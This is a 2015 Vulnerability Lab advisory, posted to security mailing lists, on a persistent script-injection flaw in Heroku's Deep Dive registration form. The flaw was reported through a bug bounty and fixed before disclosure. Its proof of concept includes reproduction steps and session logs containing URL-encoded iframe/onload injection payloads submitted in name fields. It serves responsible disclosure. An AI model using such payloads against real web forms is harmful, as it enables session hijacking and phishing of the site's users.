[<prev] [next>] [day] [month] [year] [list]
Message-ID: <54B37D32.8030806@vulnerability-lab.com>
Date: Mon, 12 Jan 2015 08:52:18 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: Heroku API Deep Dive Bug Bounty #3 - Persistent UI Vulnerability
Document Title:
===============
Heroku API Deep Dive Bug Bounty #3 - Persistent UI Vulnerability
References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1398
BugCrowd ID: 6b37910a3c5685b944a3ad65068aa251af47450953a06b8b13d74b35d708f6b0
Acknowledgement (Hall of Fame): https://bugcrowd.com/heroku/hall-of-fame
Release Date:
=============
2015-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
1398
Common Vulnerability Scoring System:
====================================
2.5
Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project.
Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers
without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and
designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps.
Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.
Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service
lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling.
Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.
(Copy of the Vendor Homepage: https://www.heroku.com/home )
We`ve been busy this fall at events meeting and talking to a lot of developers like you. We`ve great discussions and
wanted to share the knowledge with the Heroku community. In this demo, we`re going to address some of the the most
frequently asked questions. And we want to hear from you so we`ll leave the last 10 minutes for open Q&A. If you
think we should add something to the list, please let us know!
(COpy of the Vendor Homepage: http://lp2.heroku.com/Heroku_Deep_Dive_d )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Heroku API - Deep Dive web-application online service.
Vulnerability Disclosure Timeline:
==================================
2014-11-14: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-11-15: Vendor Notification (Heroku Security - Bug Bounty Program)
2014-12-06: Vendor Response/Feedback (Heroku Security - Bug Bounty Program)
2015-01-08: Vendor Fix/Patch (Heroku Developer Team - Reward: Bug Bounty)
2015-01-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Heroku
Product: Deep Dive (API) Web-Application 2015 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Heroku API - Deep Dive web-application online service.
The application-side issue allows remote attackers to compromise emails by injection of own malicious persistent context.
The heroku deep dive website impact a input field restriction mistake that affects the connected notify service. Remote attackers can
use the deep dive registration form to inject own malicious payloads that gets send through the connected service of the heroku website.
The restriction misconfiguration of the input field affects the open citrixonline.com gotomeeting notify mail. The service allows to send
by configuration but the input that performs the request needs to be encoded. After for example the input fields and POST request of the
site is restricted the payload execution not occur through the mailing service.
The security risk of the persistent mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system)
count of 2.5. Exploitation of the persistent vulnerability requires no privileged heroku account but low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external source
and persistent manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Invitation (heroku.com/Heroku_Deep_Dive_d)
Vulnerable Input(s):
[+] Firstname
[+] Lastname
Vulnerable Parameter(s):
[+] firstname & lastname
Affected Module(s):
[+] Heroku - Deep Dive
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and
with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information or
steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the website of the new heroku deep dive info service registration site
2. Include a script code payload to the firstname and lastname input fields and send it to the target mailbox
3. The execution of the persistent injected script code occurs in the mail context that arrives through the weak input restriction of the heroku service (api)
PoC: Exploit
<td><font style="font-size: 14px; font-weight: bold" color="#000000" face="arial,verdana,helvetica">Join us on
Thursday, Nov 13, 2014 10:00 AM - 10:30 AM PST</font></td>
</tr>
<tr>
<td height="20"></td>
</tr>
<tr>
<td>
<table border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td><font style="font-size: 12px;" color="#000000" face="arial,verdana,helvetica">Dear "><[PERSISTENT INJECTED SCRIPT CODE VIA POST!]>,</font></td>
</tr>
--- PoC Session Logs [POST] ---
0:36:59.324[550ms][total 550ms] Status: 200[OK]
POST http://lp2.heroku.com/form/checkEmailAjax/account_id/36622/form_field_id/164298/tracker_id/42161190/field_id/36622_164298pi_36622_164298?param=admin%2540evolution-sec.com
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[161] Mime Type[text/html]
Request Header:
Host[lp2.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X_REQUESTED_WITH[XMLHttpRequest]
Referer[http://lp2.heroku.com/Heroku_Deep_Dive_d]
Content-Length[33]
Content-Type[text/plain; charset=UTF-8]
Cookie[pardot=gplsdc4i9roje436vho74bvag7; visitor_id36622=279785406]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
param[admin%2540evolution-sec.com]
Response Header:
Date[Wed, 12 Nov 2014 23:37:06 GMT]
Server[Apache]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
X-Pardot-Rsp[28/206/241]
p3p[CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"]
Vary[Accept-Encoding,User-Agent]
Content-Encoding[gzip]
Content-Length[161]
Content-Type[text/html; charset=utf-8]
X-Pardot-LB[lb-s3]
X-Pardot-Route[public]
Connection[close]
--
0:37:19.698[986ms][total 986ms] Status: 302[Found]
POST http://lp2.heroku.com/Heroku_Deep_Dive_d
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[113] Mime Type[text/html]
Request Header:
Host[lp2.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://lp2.heroku.com/Heroku_Deep_Dive_d]
Cookie[pardot=gplsdc4i9roje436vho74bvag7; visitor_id36622=279785406]
Connection[keep-alive]
POST-Daten:
36622_164294pi_36622_164294[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL]
36622_164296pi_36622_164296[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL%22%29+%3C]
36622_164302pi_36622_164302[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL%22%29+%3C]
36622_164298pi_36622_164298[admin%40evolution-sec.com]
36622_164304pi_36622_164304[015776363337]
36622_164300pi_36622_164300[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29+%3C]
pi_extra_field[]
_utf8[%E2%98%83]
hiddenDependentFields[]
Response Header:
Date[Wed, 12 Nov 2014 23:37:26 GMT]
Server[Apache]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[http://lp2.heroku.com/deep_dive_TY]
p3p[CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"]
Vary[Accept-Encoding,User-Agent]
Content-Encoding[gzip]
Content-Length[113]
Content-Type[text/html; charset=UTF-8]
Set-Cookie[flash_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_success_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;
path=/; secure
flash_error=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_created_object_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_access_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_warning=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure]
X-Pardot-LB[lb-s3]
X-Pardot-Route[public]
Connection[close]
Reference(s):
http://lp2.heroku.com/Heroku_Deep_Dive_d
http://lp2.heroku.com/form/checkEmailAjax/
http://lp2.heroku.com/deep_dive_TY
Solution - Fix & Patch:
=======================
The vulnerability is not located at the citrix online service of gomeeting even if it looks like. The service of the heroku site does not encode/validate or restrict the input thats gets
send to the citrix online service for a mail notify. The vulnerable module is the deep dive invitation form that is not secure implemented. (http://lp2.heroku.com/deep_dive_TY)
Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the heroku deep dive service is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@...lution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@...nerability-lab.com - research@...nerability-lab.com - admin@...lution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Powered by blists - more mailing lists